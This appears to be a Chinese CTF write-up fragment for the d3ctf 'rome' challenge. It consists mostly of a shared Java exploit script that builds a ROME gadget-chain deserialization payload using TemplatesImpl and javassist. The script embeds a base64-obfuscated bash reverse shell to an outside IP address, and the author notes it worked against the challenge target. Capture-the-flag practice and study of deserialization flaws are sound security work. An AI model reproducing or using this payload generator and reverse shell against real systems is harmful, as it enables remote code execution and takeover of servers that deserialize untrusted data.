d3ctf·rome

如果想转Base64加上这个就好

ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(map);
oos.close();
System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));

				

					
				
				

					
				
				

					
				
				

					
				
			

注意版本

分享一下miku师傅的脚本

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;
 
public class miku {
    public static void setFieldValue(Object obj,String fieldname,Object value)
            throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldname);
        field.setAccessible(true);
        field.set(obj,value);
    }
 
    public static byte[] getTemplatesImpl() {
        try {
            ClassPool pool = ClassPool.getDefault();
            CtClass ctClass = pool.makeClass("Evil");
            CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
            ctClass.setSuperclass(superClass);
            CtConstructor constructor = ctClass.makeClassInitializer();
            constructor.setBody(" try {\n" +
                    " Runtime.getRuntime().exec(" + "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEyOS40Mi4xNDAvMzMwNyAwPiYx}|{base64,-d}|{bash,-i}\"}"  +
                    ");\n" +
                    " } catch (Exception ignored) {\n" +
                    " }");
            byte[] bytes = ctClass.toBytecode();
            ctClass.defrost();
            return bytes;
        } catch (Exception e) {
            e.printStackTrace();
            return new byte[]{};
        }
    }
 
    public static void main(String[] args) throws Exception{
//TemplateImpl 动态加载字节码
        byte[] code = getTemplatesImpl();
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj,"_name","jiang");
        setFieldValue(obj,"_class",null);
        // setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
        setFieldValue(obj,"_bytecodes",new byte[][]{code});
 
        ToStringBean toStringBean = new ToStringBean(Templates.class, new TemplatesImpl());
        //toStringBean.toString();
 
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
        //equalsBean.hashCode();
 
        HashMap<Object, Object> map = new HashMap<>();
        map.put(equalsBean, "bbb");
 
        setFieldValue(toStringBean, "_obj", obj);
 
        // 序列化
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(map);
        oos.close();
        String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println(payload);
 
        // 反序列化
        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(bais);
        ois.readObject();
        ois.close();
    }
}

				

					
				
				

					
				
				

					
				
				

					
				
			

其实直接用我rome链那篇笔记的也可以

calc换成反弹shell命令就可以了，本地测试有效

测试了一下靶机，不行，可能版本问题，换miku师傅就可以了，记录一下